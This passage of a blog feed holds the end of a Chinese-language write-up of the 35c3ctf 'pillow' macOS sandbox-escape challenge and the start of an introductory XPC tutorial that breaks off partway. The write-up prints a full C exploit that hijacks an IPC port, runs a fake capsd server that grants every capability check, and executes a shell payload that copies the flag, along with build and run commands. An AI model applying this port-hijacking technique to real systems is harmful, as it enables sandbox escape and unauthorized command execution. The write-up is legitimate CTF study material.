class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, <span class="number">0</span>, replyQueue);</span><br><span class="line">    <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span 
class="line">        <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, capsd_server);</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="built_in">dispatch_resume</span>(source);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 尝试绕过 sandbox capabilities check</span></span><br><span class="line">    <span class="keyword">for</span>(<span class="type">size_t</span> cnt = <span class="number">0</span>; cnt &lt; <span class="number">10000</span>; ++cnt) &#123;</span><br><span class="line">        <span class="built_in">register_completion_listener</span>(sp, <span class="string">&quot;session&quot;</span>, listener_send_right);</span><br><span class="line">        <span class="comment">// 测试基本功能</span></span><br><span class="line">        kr = <span class="built_in">shell_exec</span>(sp, <span class="string">&quot;session&quot;</span>, <span class="string">&quot;echo &#x27;Hello World&#x27;&quot;</span>);</span><br><span class="line">        <span class="keyword">if</span>(kr == KERN_SUCCESS) &#123;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;[+] shell_exec success! 
test %zu times.\n&quot;</span>, cnt);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 如果无法使用，则将该 listener 从 shelld 中删除</span></span><br><span class="line">        <span class="built_in">unregister_completion_listener</span>(sp, <span class="string">&quot;session&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>运行效果如下，可以看到成功通过 capabilities check：</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108224804659.png" alt="image-20220108224804659"></p><p>需要注意的是，调试时，最好每次都重启一下 shelld，防止其内部旧数据影响调试。</p><h2 id="五、漏洞利用">五、漏洞利用</h2><p>综合上面的内容，我们最终可以拼接出一个完整 exploit：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span 
class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;../mig/shelld.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;../common/utils.h&quot;</span></span></span><br><span 
class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;../common/decls.h&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 伪造 capsd 必备函数</span></span><br><span class="line"><span class="function"><span class="type">boolean_t</span> <span class="title">capsd_server</span></span></span><br><span class="line"><span class="function">    <span class="params">(<span class="type">mach_msg_header_t</span> *InHeadP, <span class="type">mach_msg_header_t</span> *OutHeadP)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">grant_capability</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">audit_token_t</span> token, <span class="type">pid_t</span> target, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">has_capability</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">pid_t</span> pid, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg, <span class="type">int</span>* out)</span> </span>&#123;</span><br><span class="line">    *out = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span 
class="type">int</span> argc, <span class="type">char</span>* argv[])</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 获取 bootstrap port、 shelld port 和 capsd port</span></span><br><span class="line">    <span class="type">mach_port_t</span> bp, sp, cp;</span><br><span class="line">    <span class="built_in">task_get_special_port</span>(<span class="built_in">mach_task_self</span>(), TASK_BOOTSTRAP_PORT, &amp;bp);</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bp, <span class="string">&quot;net.saelo.shelld&quot;</span>, &amp;sp);</span><br><span class="line">    <span class="built_in">ASSERT_SUCCESS</span>(kr, <span class="string">&quot;shelld bootstrap_look_up&quot;</span>);</span><br><span class="line">    kr = <span class="built_in">bootstrap_look_up</span>(bp, <span class="string">&quot;net.saelo.capsd&quot;</span>, &amp;cp);</span><br><span class="line">    <span class="built_in">ASSERT_SUCCESS</span>(kr, <span class="string">&quot;capsd bootstrap_look_up&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 先提前准备好一个可用的 session</span></span><br><span class="line">    <span class="type">char</span> long_session_name[<span class="number">4096</span>];</span><br><span class="line">    <span class="built_in">memset</span>(long_session_name, <span class="string">&#x27;a&#x27;</span>, <span class="built_in">sizeof</span>(long_session_name) - <span class="number">1</span>);</span><br><span class="line">    long_session_name[<span class="built_in">sizeof</span>(long_session_name) <span class="number">-1</span>] = <span class="number">0</span>;</span><br><span class="line">    <span class="built_in">shelld_create_session</span>(sp, long_session_name);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 尝试将 shelld 中的 capsd_service_port 释放</span></span><br><span class="line">    
<span class="built_in">register_completion_listener</span>(sp, <span class="string">&quot;non-exist-session&quot;</span>, cp);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 创建一对新的 listener 和 listener_send_right</span></span><br><span class="line">    <span class="type">mach_port_t</span> listener, listener_send_right;</span><br><span class="line">    <span class="type">mach_msg_type_name_t</span> aquired_right;</span><br><span class="line">    <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;listener);</span><br><span class="line">    <span class="built_in">mach_port_extract_right</span>(<span class="built_in">mach_task_self</span>(), listener, MACH_MSG_TYPE_MAKE_SEND, &amp;listener_send_right, &amp;aquired_right);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* 启动一个 伪capsd_server </span></span><br><span class="line"><span class="comment">       需要注意的是，这里必须创建新的 dispatch queue 给 listener，</span></span><br><span class="line"><span class="comment">       因为 main queue 需要调用 dispatch_main 才能使用，但我们仍然需要使用控制流，因此不能调用 dispatch_main */</span></span><br><span class="line">    <span class="type">dispatch_queue_main_t</span> replyQueue = <span class="built_in">dispatch_queue_create</span>(<span class="string">&quot;replyQueue&quot;</span>, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, <span class="number">0</span>, replyQueue);</span><br><span class="line">    <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">        <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, capsd_server);</span><br><span class="line">    &#125;);</span><br><span class="line">    <span 
class="built_in">dispatch_resume</span>(source);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 尝试绕过 sandbox capabilities check</span></span><br><span class="line">    <span class="keyword">for</span>(<span class="type">size_t</span> cnt = <span class="number">0</span>; cnt &lt; <span class="number">10000</span>; ++cnt) &#123;</span><br><span class="line">        <span class="built_in">register_completion_listener</span>(sp, long_session_name, listener_send_right);</span><br><span class="line">        <span class="comment">// 测试基本功能</span></span><br><span class="line">        <span class="type">const</span> <span class="type">char</span> *payload = </span><br><span class="line">            <span class="string">&quot;chmod 777 /Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag &quot;</span></span><br><span class="line">            <span class="string">&quot;&amp;&amp; cp /Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag /tmp/pillow_flag &quot;</span></span><br><span class="line">            <span class="string">&quot;&amp;&amp; open -a TextEdit /tmp/pillow_flag&quot;</span>;</span><br><span class="line">        kr = <span class="built_in">shell_exec</span>(sp, long_session_name, payload);</span><br><span class="line">        <span class="keyword">if</span>(kr == KERN_SUCCESS) &#123;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;[+] shell_exec success! 
test %zu times.\n&quot;</span>, cnt);</span><br><span class="line"></span><br><span class="line">            <span class="built_in">exit</span>(EXIT_SUCCESS);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 如果无法使用，则将该 listener 从 shelld 中删除</span></span><br><span class="line">        <span class="built_in">unregister_completion_listener</span>(sp, long_session_name);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>编译参数：</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">CC = clang</span><br><span class="line"><span class="section">myexploit: myexploit.c</span></span><br><span class="line">    <span class="variable">$(CC)</span> -g -O0 myexploit.c ../mig/shelldUser.c ../mig/capsdServer.c  -o myexploit</span><br></pre></td></tr></table></figure><p>在沙箱中执行 exploit：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">make</span><br><span class="line">sandbox-exec -f exploit.sb -D EXPLOIT_BIN=/Users/kiprey/Desktop/CTF/35c3ctf/pillow/exploit/myexploit ./myexploit</span><br></pre></td></tr></table></figure><p>运行结果：</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108232108975.png" alt="image-20220108232108975"></p><blockquote><p>调试 exp 时，最好每次在执行 exp 前都重启一下 shelld。</p></blockquote><h2 id="六、参考链接">六、参考链接</h2><ul><li><a href="https://paper.seebug.org/1453/">使用跨进程 XSS 逃逸 macOS Safari 沙箱 - Seebug</a></li><li><a 
href="https://github.com/LinusHenze/35C3_Writeups/tree/master/pillow">pillow writeup - github LinusHenze</a></li><li><a href="https://saelo.github.io/presentations/warcon18_dont_trust_the_pid.pdf">Don’t Trust the PID!  - @5aelo</a></li><li><a href="http://newosxbook.com/files/HITSB.pdf">Hack in the (sand)Box - Jonathan Levin</a></li><li><a href="https://wiki.mozilla.org/Sandbox/OS_X_Rule_Set">OSX Sandbox Rule Set - mozilla wiki</a></li><li><a href="https://www.chungkwong.cc/scheme.html">Scheme概览 - chungkwong</a></li><li><a href="https://reverse.put.as/wp-content/uploads/2011/09/Apple-Sandbox-Guide-v1.0.pdf">Apple’s Sandbox Guide v1.0</a></li><li><a href="https://ubrigens.com/posts/sandbox_coverage.html">Exploring Sandbox Coverage on macOS - ubrigens</a></li><li><a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=1417">Issue 1417: iOS/MacOS kernel double free due to IOSurfaceRootUserClient not respecting MIG ownership rules</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;pillow&lt;/code&gt;，是 35c3ctf 中的一道关于 macOS bootstrap Service 沙箱逃逸题目。本人将通过学习这一题来进一步了解Mac OSX XPC 和 Sandbox 机制。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;该题中包含了两个自定义 macOS 系统服务。要求攻击者劫持两个 XPC 服务之间的 IPC 连接，以达到沙箱逃逸的目的。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;题目链接 ： &lt;a href=&quot;https://github.com/saelo/35c3ctf/tree/master/pillow&quot;&gt;pillow - 35c3ctf github&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    
    <category term="mac" scheme="https://kiprey.github.io/tags/mac/"/>
    
    <category term="mach" scheme="https://kiprey.github.io/tags/mach/"/>
    
    <category term="ipc" scheme="https://kiprey.github.io/tags/ipc/"/>
    
    <category term="xpc" scheme="https://kiprey.github.io/tags/xpc/"/>
    
    <category term="sandbox" scheme="https://kiprey.github.io/tags/sandbox/"/>
    
  </entry>
  
  <entry>
    <title>Getting Started with MacOSX XPC</title>
    <link href="https://kiprey.github.io/2022/01/mach_xpc_intro/"/>
    <id>https://kiprey.github.io/2022/01/mach_xpc_intro/</id>
    <published>2022-01-03T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.043Z</updated>
    
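    <content type="html"><![CDATA[<h2 id="一、简介">1. Introduction</h2><ul><li><p>XPC is an OS X <strong>inter-process communication technology</strong> that complements the <strong>App Sandbox</strong> through <strong>privilege separation</strong>. <strong>Privilege separation</strong> means <strong>splitting an application into several parts</strong> according to the system resources each part needs to access, where each part may <strong>use only the privileges declared in advance (its sandbox)</strong>. Each such component is called an <strong>XPC service</strong>.</p><p>Splitting an application into several parts also improves reliability: a crash in one part of the code does not bring down the whole program.</p></li><li><p>Every XPC service runs in its own sandbox, that is, an XPC service has <strong>its own container</strong> and <strong>its own set of privileges</strong>. An XPC service bundled inside an application can only be accessed by that application. When the application launches, the system automatically registers every XPC service it finds into a namespace visible to the application. The application can then communicate with the XPC service and have it carry out requests.</p></li><li><p>Key properties of XPC services: <strong>privilege separation</strong> + <strong>fault isolation</strong></p></li><li><p>XPC services are managed by launchd. When an XPC service terminates unexpectedly (or crashes), launchd restarts it.</p></li></ul><span id="more"></span><h2 id="二、XPC-Service-使用入门">2. Getting Started with XPC Services</h2><blockquote><p>Most examples online are written in Objective-C and few XPC examples use plain C, so I also use Objective-C here to learn XPC.</p><p>Even though I have not really learned Objective-C yet…</p></blockquote><h3 id="1-创建项目">1. Creating the project</h3><p>Open Xcode, create a new project, and choose XPC Service.</p><p><img src="/2022/01/mach_xpc_intro/image-20220103163708457.png" alt="image-20220103163708457"></p><p>Then enter the Product Name and the Organization Identifier; the resulting Bundle Identifier is a string in <strong>reverse-DNS format</strong>. This Bundle ID matters a lot and is <strong>best set to a subdomain of the application's identifier</strong>, but we can ignore that for now.</p><p><img src="/2022/01/mach_xpc_intro/image-20220103163952631.png" alt="image-20220103163952631"></p><p>Xcode then generates sample XPC code that works much like an echo server.</p><p>Next we will walk through this sample code and pick up some Objective-C along the way.</p><blockquote><p>If you are not familiar with Objective-C, read along with <a href="https://www.runoob.com/ios/ios-objective-c.html">Objective-C 基础知识 - 菜鸟教程</a></p></blockquote><h3 id="2-Service-简单示例">2. A simple Service example</h3><h4 id="a-protocol">a. 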
protocol</h4><p>Before using XPC, you must first declare an <strong>interface</strong>. The interface consists mainly of a protocol, which describes the methods that can be invoked in the remote process.</p><p>Below is the protocol declaration generated by Xcode. It declares a protocol named <code>XPCDemoProtocol</code> and defines one interface method, <code>upperCaseString</code>:</p><blockquote><p>To me a protocol feels somewhat like an <strong>abstract class</strong> in C++ (one with only pure virtual functions): it implements nothing and merely <strong>declares</strong> the method interface.</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">// XPCDemoProtocol.h</span><br><span class="line"></span><br><span class="line">#import &lt;Foundation/Foundation.h&gt;</span><br><span class="line"></span><br><span class="line">// The protocol that this service will vend as its API. This header file will also need to be visible to the process hosting the service.</span><br><span class="line">@protocol XPCDemoProtocol</span><br><span class="line"></span><br><span class="line">// Replace the API of this protocol with an API appropriate to the service you are vending.</span><br><span class="line">- (void)upperCaseString:(NSString *)aString withReply:(void (^)(NSString *))reply;</span><br><span class="line">    </span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>The protocol defines the programming interface between the <strong>calling application</strong> and the <strong>XPC service</strong>. Every <strong>method that the calling application needs to invoke</strong> must be specified in the protocol. Note that XPC communication is asynchronous, so every method in the protocol must return void; to return data, use a <strong>reply block</strong>, as in the second parameter of <code>upperCaseString</code> in the code above, which works like a callback. (<a href="https://www.runoob.com/ios/ios-objective-c.html">What is a block?</a>)</p><h4 id="b-interface">b. 
interface</h4><p>After <strong>declaring</strong> the protocol, we need to <strong>provide a class that implements it</strong>. The code here therefore declares the <code>XPCDemo</code> class, which inherits from NSObject and conforms to the protocol:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//  XPCDemo.h</span><br><span class="line"></span><br><span class="line">#import &lt;Foundation/Foundation.h&gt;</span><br><span class="line">#import &quot;XPCDemoProtocol.h&quot;</span><br><span class="line"></span><br><span class="line">// This object implements the protocol which we have defined. It provides the actual behavior for the service. It is &#x27;exported&#x27; by the service to make it available to the process hosting the service over an NSXPCConnection.</span><br><span class="line">@interface XPCDemo : NSObject &lt;XPCDemoProtocol&gt;</span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>And the implementation of the class:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">//  XPCDemo.m</span><br><span class="line"></span><br><span class="line">#import &quot;XPCDemo.h&quot;</span><br><span class="line"></span><br><span class="line">@implementation XPCDemo</span><br><span class="line"></span><br><span class="line">// This implements the example protocol. 
Replace the body of this class with the implementation of this service&#x27;s protocol.</span><br><span class="line">- (void)upperCaseString:(NSString *)aString withReply:(void (^)(NSString *))reply &#123;</span><br><span class="line">    NSString *response = [aString uppercaseString];</span><br><span class="line">    reply(response);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>上面的代码主要做了两件事情：</p><ol><li>定义一个 protocol，即远程进程可以调用的函数接口</li><li>创建一个继承自该 protocol 的类，并实现这些函数接口。</li></ol><p>这里的 <code>upperCaseString</code> 函数只做了一件事情：<strong>将传入的字符串全部转换为大写，并调用 callback 将结果返回</strong>。</p><h4 id="c-NSXPCListener">c. NSXPCListener</h4><p>看上去还挺好理解，那就继续看看 main 文件。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">int main(int argc, const char *argv[])</span><br><span class="line">&#123;</span><br><span class="line">    // Create the delegate for the service.</span><br><span class="line">    ServiceDelegate *delegate = [ServiceDelegate new];</span><br><span class="line">    </span><br><span class="line">    // Set up the one NSXPCListener for this service. It will handle all incoming connections.</span><br><span class="line">    NSXPCListener *listener = [NSXPCListener serviceListener];</span><br><span class="line">    listener.delegate = delegate;</span><br><span class="line">    </span><br><span class="line">    // Resuming the serviceListener starts this service. 
This method does not return.</span><br><span class="line">    [listener resume];</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>main 函数中创建了一个 NSXPCListener 类，并设置 listener 的<strong>委托</strong>，之后执行 resume 函数。</p><p>看上去有点不明觉厉，找了下 <code>NSXPCListener</code> 的类声明：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">// Each NSXPCListener instance has a private serial queue. This queue is used when sending the delegate messages.</span><br><span class="line">API_AVAILABLE(macos(10.8), ios(6.0), watchos(2.0), tvos(9.0))</span><br><span class="line">@interface NSXPCListener : NSObject</span><br><span class="line"></span><br><span class="line">// If your listener is an XPCService (that is, in the XPCServices folder of an application or framework), then use this method to get the shared, singleton NSXPCListener object that will await new connections. When the resume method is called on this listener, it will not return. Instead it hands over control to the object and allows it to service the listener as appropriate. This makes it ideal for use in your main() function. 
For more info on XPCServices, please refer to the developer documentation.</span><br><span class="line">+ (NSXPCListener *)serviceListener;</span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">// The delegate for the connection listener. If no delegate is set, all new connections will be rejected. See the protocol for more information on how to implement it.</span><br><span class="line">@property (nullable, weak) id &lt;NSXPCListenerDelegate&gt; delegate;</span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">// All listeners start suspended and must be resumed before they will process incoming requests. If called on the serviceListener, this method will never return. Call it as the last step inside your main function in your XPC service after setting up desired initial state and the listener itself. If called on any other NSXPCListener, the connection is resumed and the method returns immediately.</span><br><span class="line">- (void)resume;</span><br><span class="line"></span><br><span class="line">// Suspend the listener. Suspends must be balanced with resumes before the listener may be invalidated.</span><br><span class="line">- (void)suspend;</span><br><span class="line"></span><br><span class="line">// Invalidate the listener. No more connections will be created. Once a listener is invalidated it may not be resumed or suspended.</span><br><span class="line">- (void)invalidate;</span><br><span class="line"></span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>可以看到，</p><ul><li>对于 XPCService 而言，<code>serviceListener</code> 属性是 XPCService 用于监听 XPC connection 的监听器。</li><li>当有新 XPC 连接到来时，连接将通过所设置的 delegate 进行处理。</li><li>在 XPC Service 初始执行并完成一系列初始化步骤后，调用 listener 的 resume 方法以开始提供 XPC 服务，该方法将<strong>不会返回</strong>。</li></ul><h4 id="d-NSXPCListenerDelegate">d. 
NSXPCListenerDelegate</h4><p>With the main function mostly understood, let's look at <code>NSXPCListenerDelegate</code>. Here is its protocol declaration:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">@protocol NSXPCListenerDelegate &lt;NSObject&gt;</span><br><span class="line">@optional</span><br><span class="line">// Accept or reject a new connection to the listener. This is a good time to set up properties on the new connection, like its exported object and interfaces. If a value of NO is returned, the connection object will be invalidated after this method returns. Be sure to resume the new connection and return YES when you are finished configuring it and are ready to receive messages. You may delay resuming the connection if you wish, but still return YES from this method if you want the connection to be accepted.</span><br><span class="line">- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection;</span><br><span class="line"></span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>The protocol declares one optional method, <code>listener</code>. Its parameters are:</p><ul><li><code>listener</code>: of type <strong>NSXPCListener *</strong></li><li><code>newConnection</code>: of type <strong>NSXPCConnection *</strong>, the newly arrived connection</li></ul><p>The return value is of type <code>BOOL</code>, whose possible values are <code>YES</code> and <code>NO</code>.</p><blockquote><p>Objective-C code can also use two other Boolean types: <strong>bool (true, false)</strong> and <strong>Boolean (TRUE, FALSE)</strong>.</p></blockquote><p>This method is called to set properties on a <strong>new connection</strong>, a kind of <strong>pre</strong>-processing step. It can <strong>accept or reject the incoming connection</strong>, and it is free to decide when to <strong>resume the connection</strong>. Now let's see what the default generated implementation does:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">//  main.m</span><br><span class="line"></span><br><span class="line">#import &lt;Foundation/Foundation.h&gt;</span><br><span class="line">#import &quot;XPCDemo.h&quot;</span><br><span class="line"></span><br><span class="line">@interface ServiceDelegate : NSObject &lt;NSXPCListenerDelegate&gt;</span><br><span class="line">@end</span><br><span class="line"></span><br><span class="line">@implementation ServiceDelegate</span><br><span class="line"></span><br><span class="line">- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection &#123;</span><br><span class="line">    // This method is where the NSXPCListener configures, accepts, and resumes a new incoming NSXPCConnection.</span><br><span class="line">    </span><br><span class="line">    // Configure the connection.</span><br><span class="line">    // First, set the interface that the exported object implements.</span><br><span class="line">    newConnection.exportedInterface = [NSXPCInterface 
interfaceWithProtocol:@protocol(XPCDemoProtocol)];</span><br><span class="line">    </span><br><span class="line">    // Next, set the object that the connection exports. All messages sent on the connection to this service will be sent to the exported object to handle. The connection retains the exported object.</span><br><span class="line">    XPCDemo *exportedObject = [XPCDemo new];</span><br><span class="line">    newConnection.exportedObject = exportedObject;</span><br><span class="line">    </span><br><span class="line">    // Resuming the connection allows the system to deliver more incoming messages.</span><br><span class="line">    [newConnection resume];</span><br><span class="line">    </span><br><span class="line">    // Returning YES from this method tells the system that you have accepted this connection. If you want to reject the connection for some reason, call -invalidate on the connection and return NO.</span><br><span class="line">    return YES;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>该函数将会为每个<strong>新连接</strong>设置其 <strong>exportedInterface</strong> 与 <strong>exportedObject</strong> ，并恢复该连接，换句话说，该函数会在处理连接之前设置传入连接的两个成员。</p><p>至于这种设置是为了什么，我们需要再看看 NSXPCConnection 类的声明，以下是截取出的部分声明：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">// This object is the main configuration mechanism for the communication between two processes. Each NSXPCConnection instance has a private serial queue. This queue is used when sending messages to reply handlers, interruption handlers, and invalidation handlers.</span><br><span class="line">API_AVAILABLE(macos(10.8), ios(6.0), watchos(2.0), tvos(9.0))</span><br><span class="line">@interface NSXPCConnection : NSObject &lt;NSXPCProxyCreating&gt;</span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">// The interface that describes messages that are allowed to be received by the exported object on this connection. This value is required if a exported object is set.</span><br><span class="line">@property (nullable, retain) NSXPCInterface *exportedInterface;</span><br><span class="line"></span><br><span class="line">// Set an exported object for the connection. Messages sent to the remoteObjectProxy from the other side of the connection will be dispatched to this object. Messages delivered to exported objects are serialized and sent on a non-main queue. The receiver is responsible for handling the messages on a different queue or thread if it is required.</span><br><span class="line">@property (nullable, retain) id exportedObject;</span><br><span class="line"></span><br><span 